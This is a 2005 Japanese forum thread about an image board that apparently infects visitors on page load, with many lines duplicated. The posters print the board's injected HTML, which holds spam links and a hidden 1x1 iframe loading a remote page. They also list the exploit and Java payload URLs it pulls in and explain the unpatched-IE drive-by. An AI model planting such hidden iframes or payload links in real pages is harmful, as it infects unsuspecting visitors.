開いただけでウイルスに感染するページ
ttp://www.prenavi.net/~faristan/cgi-bin/imgboard.cgi
Trojan.AnicmooとTrojan.ByteVerifyが見つかったんだが、どこに仕掛けてあるんだ?
Trojan.AnicmooとTrojan.ByteVerifyが見つかったんだが、どこに仕掛けてあるんだ?
|
|
|
790 :名無しさん@お腹いっぱい。:2005/05/20(金) 20:59:03
AVGで片っ端から踏んだけど何もでないや??
791 :名無しさん@お腹いっぱい。:2005/05/20(金) 23:04:12
そりゃ糞いや。
792 :名無しさん@お腹いっぱい。:2005/05/21(土) 00:20:13
>>790
まさにWindows Updateに救われているソフトですな
まさにWindows Updateに救われているソフトですな
793 :名無しさん@お腹いっぱい。:2005/05/21(土) 12:23:04
この板のトロイの木馬2台目というスレで即ノートン先生が検出したぞ!
ウィルス張ったやつ市ね。
ウィルス張ったやつ市ね。
794 :名無しさん@お腹いっぱい。:2005/05/21(土) 12:27:52
>>789
<HTML lang="ja">
<HEAD><TITLE>画像掲示板(Light)</TITLE>
<STYLE>
</STYLE>
</HEAD>
<BODY BGCOLOR="#FAF0E6" BACKGROUND="" TEXT="#2F4F4F" LINK="#6060FF" VLINK="#4040FF">
<BR>
<FONT SIZE="+1" COLOR="#FF0000"><B> </B></FONT>
名前:<FONT COLOR="#00FF00"><B> </B></FONT>
[2005/05/08,11:10:23] No.271 <a href="imgboard.cgi?bbsaction=disp_rep_form&amode=&page=1&blood=20050508111023&parent=271">返信</a>
<BLOCKQUOTE><!-- body_start -->
<a target="_blank" href="http://lol.to/book.php?book=ilove">HOT PUSY</a><br><BR>http://lol.to/book.php?book=BAVAK<BR>
<iframe src="http://www1.pimpspace.com/beach/Beach/XXX.html" height="1" width="1"></iframe><!-- user: ?igip-fo.rzone.de-->
</BLOCKQUOTE>
</BODY>
</HTML>
<HTML lang="ja">
<HEAD><TITLE>画像掲示板(Light)</TITLE>
<STYLE>
</STYLE>
</HEAD>
<BODY BGCOLOR="#FAF0E6" BACKGROUND="" TEXT="#2F4F4F" LINK="#6060FF" VLINK="#4040FF">
<BR>
<FONT SIZE="+1" COLOR="#FF0000"><B> </B></FONT>
名前:<FONT COLOR="#00FF00"><B> </B></FONT>
[2005/05/08,11:10:23] No.271 <a href="imgboard.cgi?bbsaction=disp_rep_form&amode=&page=1&blood=20050508111023&parent=271">返信</a>
<BLOCKQUOTE><!-- body_start -->
<a target="_blank" href="http://lol.to/book.php?book=ilove">HOT PUSY</a><br><BR>http://lol.to/book.php?book=BAVAK<BR>
<iframe src="http://www1.pimpspace.com/beach/Beach/XXX.html" height="1" width="1"></iframe><!-- user: ?igip-fo.rzone.de-->
</BLOCKQUOTE>
</BODY>
</HTML>
795 :名無しさん@お腹いっぱい。:2005/05/21(土) 12:38:14
>>789
腐れにちゃんが! この程度のソースくらい投稿させろや
このソースの一部で反応するから、html保存して実行してごらん
http://81.222.131.59/dl/adv659.php
http://81.222.131.59/dl/adv659/sploit.anr
http://205.252.250.226/zator/adv3048/nt/java/classload.jar
いわゆるこれらのファイルを読み込んで実行しようとしている
つまり、これら画像プレビュー表示のある掲示板だと、
表示しただけでIEの脆弱性を利用される事になるから、
Windows Updateしていないくて
使っているウィルス対策ソフトもスルーした場合、
ウィルスのインストーラーが実行されてウィルスに感染する事になる。
削除しない管理人は、これらの脆弱性に対して無知なんだろうけどな!
わざとかもしれないけどな
腐れにちゃんが! この程度のソースくらい投稿させろや
このソースの一部で反応するから、html保存して実行してごらん
http://81.222.131.59/dl/adv659.php
http://81.222.131.59/dl/adv659/sploit.anr
http://205.252.250.226/zator/adv3048/nt/java/classload.jar
いわゆるこれらのファイルを読み込んで実行しようとしている
つまり、これら画像プレビュー表示のある掲示板だと、
表示しただけでIEの脆弱性を利用される事になるから、
Windows Updateしていないくて
使っているウィルス対策ソフトもスルーした場合、
ウィルスのインストーラーが実行されてウィルスに感染する事になる。
削除しない管理人は、これらの脆弱性に対して無知なんだろうけどな!
わざとかもしれないけどな
796 :名無しさん@お腹いっぱい。:2005/05/21(土) 12:56:44
age
797 :名無しさん@お腹いっぱい。:2005/05/21(土) 13:15:45
この脆弱性を利用された場合、これらを利用するDownload Ject関連の脆弱性を残したままでいると、
ウィルスだけじゃなくて、仕込んだやつに知識があってプログラムも書けるやつだと、
コンピュータ内のファイルを切り刻んだり、システムファイルを消してしまったり、
実際に何でも可能で悪質なプログラムを実行されてしまう。
ウィルスだけじゃなくて、仕込んだやつに知識があってプログラムも書けるやつだと、
コンピュータ内のファイルを切り刻んだり、システムファイルを消してしまったり、
実際に何でも可能で悪質なプログラムを実行されてしまう。